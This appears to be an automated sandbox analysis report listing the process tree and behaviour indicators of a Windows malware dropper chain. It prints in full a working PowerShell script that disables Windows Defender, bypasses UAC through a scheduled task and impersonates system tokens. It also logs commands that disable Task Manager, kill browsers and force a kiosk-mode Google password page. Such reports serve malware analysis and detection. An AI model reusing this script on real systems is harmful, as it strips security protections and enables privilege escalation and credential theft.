pid Process 2632 H3tyh96.exe 3148 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1216 wrote to memory of 384 1216 d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe 85 PID 1216 wrote to memory of 384 1216 d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe 85 PID 1216 wrote to memory of 384 1216 d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe 85 PID 384 wrote to memory of 2632 384 skotes.exe 86 PID 384 wrote to memory of 2632 384 skotes.exe 86 PID 384 wrote to memory of 2632 384 skotes.exe 86 PID 384 wrote to memory of 3540 384 skotes.exe 93 PID 384 wrote to memory of 3540 384 skotes.exe 93 PID 384 wrote to memory of 3540 384 skotes.exe 93 PID 3540 wrote to memory of 1324 3540 UkYEOVR.exe 95 PID 3540 wrote to memory of 1324 3540 UkYEOVR.exe 95 PID 3540 wrote to memory of 1324 3540 UkYEOVR.exe 95 PID 384 wrote to memory of 2832 384 skotes.exe 98 PID 384 wrote to memory of 2832 384 skotes.exe 98 PID 384 wrote to memory of 2832 384 skotes.exe 98 PID 2632 wrote to memory of 1216 2632 H3tyh96.exe 102 PID 2632 wrote to memory of 1216 2632 H3tyh96.exe 102 PID 2632 wrote to memory of 1216 2632 H3tyh96.exe 102 PID 384 wrote to memory of 2164 384 skotes.exe 105 PID 384 wrote to memory of 2164 384 skotes.exe 105 PID 384 wrote to memory of 2164 384 skotes.exe 105 PID 1216 wrote to memory of 1776 1216 powershell.exe 108 PID 1216 wrote to memory of 1776 1216 powershell.exe 108 PID 1216 wrote to memory of 1776 1216 powershell.exe 108 PID 1216 wrote to memory of 4640 1216 powershell.exe 110 PID 1216 wrote to memory of 4640 1216 powershell.exe 110 PID 1216 wrote to memory of 4640 1216 powershell.exe 110 PID 1216 wrote to memory of 596 1216 powershell.exe 112 PID 1216 wrote to memory of 596 1216 powershell.exe 112 PID 1216 wrote to memory of 596 1216 powershell.exe 112 PID 1216 wrote to memory of 2104 1216 powershell.exe 113 PID 1216 wrote to memory of 2104 1216 powershell.exe 113 PID 1216 wrote to memory of 2104 1216 powershell.exe 113 PID 1216 wrote to memory of 4680 1216 powershell.exe 114 PID 1216 wrote to memory of 4680 1216 powershell.exe 114 PID 1216 wrote to memory of 4680 1216 powershell.exe 114 PID 1324 wrote to memory of 4132 1324 WScript.exe 117 PID 1324 wrote to memory of 4132 1324 WScript.exe 117 PID 1324 wrote to memory of 4132 1324 WScript.exe 117 PID 4132 wrote to memory of 1732 4132 cmd.exe 119 PID 4132 wrote to memory of 1732 4132 cmd.exe 119 PID 4132 wrote to memory of 1732 4132 cmd.exe 119 PID 4132 wrote to memory of 4808 4132 cmd.exe 120 PID 4132 wrote to memory of 4808 4132 cmd.exe 120 PID 4680 wrote to memory of 3952 4680 powershell.exe 121 PID 4680 wrote to memory of 3952 4680 powershell.exe 121 PID 4680 wrote to memory of 3952 4680 powershell.exe 121 PID 4680 wrote to memory of 5032 4680 powershell.exe 122 PID 4680 wrote to memory of 5032 4680 powershell.exe 122 PID 4680 wrote to memory of 5032 4680 powershell.exe 122 PID 384 wrote to memory of 3592 384 skotes.exe 124 PID 384 wrote to memory of 3592 384 skotes.exe 124 PID 384 wrote to memory of 3592 384 skotes.exe 124 PID 4680 wrote to memory of 1444 4680 powershell.exe 125 PID 4680 wrote to memory of 1444 4680 powershell.exe 125 PID 4680 wrote to memory of 1444 4680 powershell.exe 125 PID 4680 wrote to memory of 4676 4680 powershell.exe 126 PID 4680 wrote to memory of 4676 4680 powershell.exe 126 PID 4680 wrote to memory of 4676 4680 powershell.exe 126 PID 4680 wrote to memory of 5012 4680 powershell.exe 127 PID 4680 wrote to memory of 5012 4680 powershell.exe 127 PID 4680 wrote to memory of 5012 4680 powershell.exe 127 PID 4808 wrote to memory of 4156 4808 HyperServerFontdll.exe 128 PID 4808 wrote to memory of 4156 4808 HyperServerFontdll.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe"C:\Users\Admin\AppData\Local\Temp\d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1776
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4640
-
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵
- System Location Discovery: System Language Discovery
PID:2104
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 33324⤵
- Program crash
PID:3304
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe"C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\dllnet\yLU75wsHgukerTkv.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\dllnet\J0k4As.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1732
-
-
C:\dllnet\HyperServerFontdll.exe"C:\dllnet/HyperServerFontdll.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\v63keZlD5I.bat"7⤵PID:4156
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:888
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:1768
-
-
C:\Users\Public\Music\winlogon.exe"C:\Users\Public\Music\winlogon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013735001\f138def07d.exe"C:\Users\Admin\AppData\Local\Temp\1013735001\f138def07d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 14804⤵
- Program crash
PID:3992
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013736001\c92de24d75.exe"C:\Users\Admin\AppData\Local\Temp\1013736001\c92de24d75.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2164
-
-
C:\Users\Admin\AppData\Local\Temp\1013737001\5a5b5e6249.exe"C:\Users\Admin\AppData\Local\Temp\1013737001\5a5b5e6249.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3592
-
-
C:\Users\Admin\AppData\Local\Temp\1013738001\9b2bbd9be9.exe"C:\Users\Admin\AppData\Local\Temp\1013738001\9b2bbd9be9.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4996 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:4928
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3148 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1928 -parentBuildID 20240401114208 -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0acc296-efdd-412c-9413-554cc5ff5093} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" gpu6⤵PID:3696
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {180d1d45-6b13-49c5-858b-b281bb9d5b24} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" socket6⤵PID:4892
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3024 -childID 1 -isForBrowser -prefsHandle 2912 -prefMapHandle 3036 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc31e5e3-e860-4cb7-b529-efc4599d3254} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" tab6⤵PID:692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2544 -childID 2 -isForBrowser -prefsHandle 1232 -prefMapHandle 2560 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24717f92-f5e1-4e1b-b77c-8200e10d6e8a} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" tab6⤵PID:4684
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4740 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4884 -prefMapHandle 4880 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79148f87-706e-4dd4-95de-829625379c96} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" utility6⤵
- Checks processor information in registry
PID:5616
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5484 -childID 3 -isForBrowser -prefsHandle 5268 -prefMapHandle 5420 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c56363e-2419-4326-b322-9a4a95d911eb} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" tab6⤵PID:5236
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5612 -childID 4 -isForBrowser -prefsHandle 5620 -prefMapHandle 5624 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e021c121-45ed-44a2-8d39-dd647c741905} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" tab6⤵PID:5252
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5816 -childID 5 -isForBrowser -prefsHandle 5896 -prefMapHandle 5892 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49f80322-8a65-44c3-a441-6a14f9a284f6} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" tab6⤵PID:5272
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013739001\50452030ad.exe"C:\Users\Admin\AppData\Local\Temp\1013739001\50452030ad.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3980
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
